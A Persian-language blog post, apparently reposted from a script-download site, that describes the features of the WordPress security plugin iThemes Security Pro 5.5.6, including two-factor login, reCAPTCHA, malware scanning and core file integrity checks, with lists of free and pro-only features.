قبلا هم اشاره کردیم که این افزونه به قابلیت تشخیص تغییر فایل ها مجهز است. اما امکانی که جدیدا به افزونه اضافه شده به iThemes Security Pro اجازه میدهد که فایل های هسته ی وردپرس را با فایل های موجود در wordpress.org مقایسه کند تا از این طریق مطمئن شود که تغییرات صورت گرفته در این فایلها مخرب نبوده و فایلهای هسته ی سایت شما با فایل های هسته ی رسمی وردپرس منطبق هستند.

بهره گیری از سرویس reCAPTCHA گوگل

با بهره گیری از این امکان میتوانید به بخش های مثل صفحه ورود وردپرس، ثبت نام کاربران و درج دیدگاه ها در وردپرس، امکان استفاهد از سرویس ریکپچای گوگل را اضافه نمایید. به این ترتیب از سوء استفاده ربات ها از این بخش ها جلوگیری به عمل خواهید آورد.

استفاده از لاگین دو مرحله ای Two Factor Authentication

لاگین دو مرحله ای یا Two Factor Authentication امکان بسیار مهم و جالبی است. با استفاده از این امکان لایه ی امنیتی جدیدی به سایت شما افزوده میشود. در صورت استفاده از Two Factor Authentication در زمان ورود به وردپرس لازم است که علاوه بر رمز عبور خود، کدی که بر روی موبایل خود دریافت میکنید را نیز به سیستم ارائه کنید. در این حالت حتی اگر کسی رمز شما را حدس هم بزند، به این جهت که نمیتواند کد امنیتی دوم را وارد سیستم کند، از ورود وی به وردپرس جلوگیری به عمل خواهد آمد.

بررسی امنیت کاربران در وردپرس

افراد سودجو و خرابکار، همیشه از طریق اکانت مدیر اصلی وارد وردپرس نمیشوند. داشتن یک حساب کاربری ناامن در وردپرس میتواند درهای وبسایت شما را به روی انواع خطرهای امنیتی باز کند. با استفاده از امکان بررسی امنیت کاربران در افزونه iThemes security pro شما میتوانید اکانت های کاربران را به دنبال نقاط نا امن بررسی کرده و از امنیت آنها اطمینان حاصل کنید.

این امکان میتواند به شما اعلام کند که کدام کاربران ورود دو مرحله ای را بر روی اکانت خود فعال نکرده اند و هر کاربر آخرین بار چه زمانی فعال بوده است. شما میتوانید به صورت آنی افرادی که وارد سیستم شده اند را مشاهده کرده و در صورت نیاز آنها را بلافاصله از سیستم بیرون بیاندازید تا مجبور شوند دوباره وارد سیستم شوند. شما میتوانید نقش کاربران را به صورت آنی تغییر دهید و اکانت هایی که بی کاربرد هستند یا در مدتی طولانی مورد استفاده قرار نگرفته اند را از سیستم حذف کنید.

اسکن سایت به دنبال بدافزار ها – Malware Scanning

افزونه iThemes Security Pro برای اسکن سایت از Sucuri SiteCheck استفاده میکند. شما میتوانید با این ابزار سایت خود را اسکن کنید و در صورتی که سایت شما به علت وجود Malware در بلک لیست قرار گرفته باشد، بلافاصله از این مسئله اطلاع پیدا کنید. این ابزار همچنین میتواند خطاهای احتمالی و آپدیت نبودن نرم افزار سایت را نیز به شما اعلام کند. همچنین در صورت نیاز امکان زمانبندی اسکن های روزانه نیز برای شما فراهم شده. در این حالت در صورت مشاهده مشکل، iThemes Security Pro میتواند شما را از طریق ارسال ایمیل از این امر باخبر کند.

اسکن سایت به دنبال بدافزار ها – Malware Scanning

در بالا به توضیح برخی امکانات اصلی افزونه iThemes Security Pro پرداختیم. اما امکانات این افزونه به همینجا ختم نمیشود. لیستی از امکانات کلی این افزونه به همراه امکانات اضافی آن نسبت به نسخه رایگان، برای شما درج شده.

امکانات افزونه امنیتی iThemes Security Pro :

ویژگی هایی که در زیر درج شده هم در نسخه ی رایگان و هم در نسخه ی حرفه ای افزونه موجودند.

  • بررسی امنیت سایت تنها با یک کلیک
  • بن کردن کاربران مخرب
  • بن کردن IP ها یا agent های خاص و جلوگیری از دسترسی آنها به سایت
  • تشخیص خطای ۴۰۴
  • مخفی کردن آدرس ورود به ناحیه مدیریت وردپرس
  • تغییر کلید های امنیتی وردپرس
  • حالت Away
  • ایجاد بکاپ از دیتابیس
  • تشخیص تغییر فایل ها
  • حذف اطلاعات سربرگ Windows Live Writer
  • حذف اطلاعات سربرگ RSD
  • حذف هشدار آپدیت از نقش های کاربری خاص در وردپرس
  • غیر فعال کردن خطاهای ورود
  • تغییر نام کاربری admin
  • تغییر ID کاربری که دارای شناسه ۱ باشد
  • تغییر پیشوند جداول وردپرس
  • تغییر مسیر wp-content
  • الزام استفاده از SSL برای نوشته ها، برگه ها و ناحیه مدیریت وردپرس
  • غیر فعال کردن امکان ویرایش فایل در ناحیه مدیریت وردپرس
  • کاهش کامنت های اسپم
  • جلوگیری از حملات بروت فورس
  • جلوگیری از حمله بروت فروس بر روی فایل XML-RPC
  • لاگ های امنیتی
  • ارسال ایمیل های نوتفیکیشن
  • پیام قفل شدن دسترسی قابل سفارشی سازی
  • الزام استفاده از رمز های دشوار
  • بررسی سطح دسترسی فایل ها
  • اسکن بدافزار

امکانات انحصاری افزونه iThemes Security Pro

امکاناتی که در زیر درج شده تنها در این نسخه یعنی نسخه ی حرفه ای افزونه (iThemes Security Pro) موجود هستند.

  • ابزارک داشبورد وردپرس
  • یکپارچه سازی با گوگل ریکپچا
  • سیستم لاگین دو مرحله ای یا Two Factor Authentication
  • امکان برون ریزی و درون ریزی تنظمیات
  • امکان بررسی صحت فایل های هسته ی وردپرس به صورت آنلاین
  • امکان زمانبندی اسکن Malware
  • ثبت لاگ عملیات کاربران
  • تغییر موقت نقش کاربر در بازه زمانی خاص
  • یکپارچه سازی با WP-CLI
  • پسورد های دارای تاریخ انقضا
  • بررسی امنیت کاربران
  • و..

نوشته افزونه فوق امنیتی وردپرس Security Pro نسخه ۵٫۵٫۶ اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.



لینک منبع مطلب

صفحه 1 از 3
123 بعدی